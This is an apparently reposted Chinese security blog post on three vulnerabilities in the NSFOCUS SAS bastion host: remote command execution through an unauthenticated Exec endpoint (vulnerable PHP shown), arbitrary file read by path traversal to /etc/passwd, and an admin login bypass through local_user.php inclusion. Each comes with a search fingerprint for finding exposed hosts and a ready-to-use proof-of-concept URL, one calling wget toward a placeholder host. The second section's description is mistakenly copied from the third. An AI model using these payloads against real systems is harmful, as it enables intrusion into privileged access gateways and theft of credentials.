绿盟 SAS堡垒机漏洞

admin 2023年8月10日21:03:40评论804 views字数 1303阅读4分20秒阅读模式

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

一、绿盟 SAS堡垒机 Exec 远程命令执行漏洞

漏洞描述

绿盟 SAS堡垒机 Exec 远程命令执行漏洞

漏洞影响

绿盟 SAS堡垒机

网络测绘

body="'/needUsbkey.php?username='"

漏洞复现

登陆页面

绿盟 SAS堡垒机漏洞

漏洞存在于文件 ExecController.php 文件中

绿盟 SAS堡垒机漏洞

<?php   require_once 'Nsc/Websvc/Response.php'; class ExecController extends Cavy_Controller_Action {    var $models = 'no';    public function index() {     $command = $this->_params['cmd'];     $ret = 0;     $output = array();     exec($command,$output,$ret);     $result = new StdClass;     if ($ret != 0) {       $result->code = Nsc_Websvc_Response::EXEC_ERROR;       $result->text = "exec error";     }     else {       $result->code = Nsc_Websvc_Response::SUCCESS;       //            $result->text = implode("n",$output);       $result->text = "WEBSVC OK";     }     $this->_render(array('result'=>$result),'/websvc/result');   } } ?>

验证POC

 /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx

绿盟 SAS堡垒机漏洞

绿盟 SAS堡垒机漏洞

二、绿盟 SAS堡垒机 GetFile 任意文件读取漏洞

漏洞描述

绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录

漏洞影响

绿盟 SAS堡垒机

网络测绘

body="'/needUsbkey.php?username='"

漏洞复现

登陆页面

绿盟 SAS堡垒机漏洞

漏洞存在于文件 GetFileController.php 文件中

绿盟 SAS堡垒机漏洞

验证POC

 /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd

绿盟 SAS堡垒机漏洞

三、绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞

漏洞描述

绿盟堡垒机存在任意用户登录漏洞,攻击者通过漏洞包含 www/local_user.php 实现任意⽤户登录

漏洞影响

绿盟 SAS堡垒机

网络测绘

body="'/needUsbkey.php?username='"

漏洞复现

登陆页面

绿盟 SAS堡垒机漏洞

验证POC

 /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin


绿盟 SAS堡垒机漏洞


绿盟 SAS堡垒机漏洞



原文始发于微信公众号(浪飒sec):绿盟 SAS堡垒机漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月10日21:03:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绿盟 SAS堡垒机漏洞http://cn-sec.com/archives/1947663.html

发表评论

匿名网友 填写信息